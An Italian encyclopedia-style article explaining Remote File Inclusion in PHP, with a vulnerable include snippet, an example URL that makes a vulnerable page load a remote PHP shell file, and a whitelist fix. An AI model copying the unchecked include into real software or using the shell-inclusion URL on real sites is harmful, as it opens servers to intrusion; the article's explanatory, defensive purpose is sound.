# Remote File Inclusion
Remote File Inclusion, o RFI, nell'ambito della sicurezza informatica indica una vulnerabilità che affligge i servizi web con uno scarso controllo delle variabili arrivate da un utente, in particolare le variabili GET e POST del PHP. La vulnerabilità si manifesta quando una pagina da includere viene passata per una variabile non controllata.

## Codice vulnerabile
Questo è un semplice esempio di un codice vulnerabile:
```
  
<?php
 
  
$var
 
=
 
$_GET
[
'var'
];
 
  
include
 
(
$var
);

  
?>

```

con una conoscenza anche limitata del PHP è molto chiaro ciò che accade, andando su quella pagina e modificando la variabile $var (presente nell'URL) a piacere si può vedere in azione il bug.
```
http://miosito.it/pagina_vulnerabile.php?var=http://www.miositoincluso.it
```

in questo caso la variabile var assume il valore dell'URL immesso e nella pagina sarà inclusa la index di miositoincluso.it

## Come funziona l'attacco
Se c'è la possibilità di un'inclusione arbitrale di codice PHP un cracker può includere una shell in PHP
```
http://miositovulnerabile.it/pagina_vulnerabile.php?var=miosito.it/shell.txt
```

da notare che la pagina da includere non deve essere in PHP (perché altrimenti viene incluso solo l'output HTML generato della pagina e non il codice vero e proprio).

## Come difendersi
In genere quando si deve includere una pagina esterna nella propria applicazione web si vuole includere solo un insieme molto ristretto e numerato di possibili pagine, e non tutte le pagine web di questo mondo. Basta quindi fare uno switch-case sui possibili valori della variabile GET, e a seconda del valore includere la pagina desiderata, senza lasciare completamente libero arbitrio all'utente. Basta questa accortezza per evitare ogni tipo di vulnerabilità di RFI.
```
http://miosito.it/index.php?var=1
```

poi all'interno della pagina si effettua un controllo tra il possibile numero e il suo corrispettivo sito. Esempio:
```
<?php

 
$var
 
=
 
$_GET
[
'var'
];

 
if
 
(
$var
 
==
 
1
)
include
 
(
'http://miositoesterno.it/miapagina1.php'
);

 
elseif
 
(
$var
 
==
 
2
)
include
 
(
'http://miositoesterno.it/miapagina2.php'
);

 
else
 
die
(
'tentativo di intrusione'
);

?>

```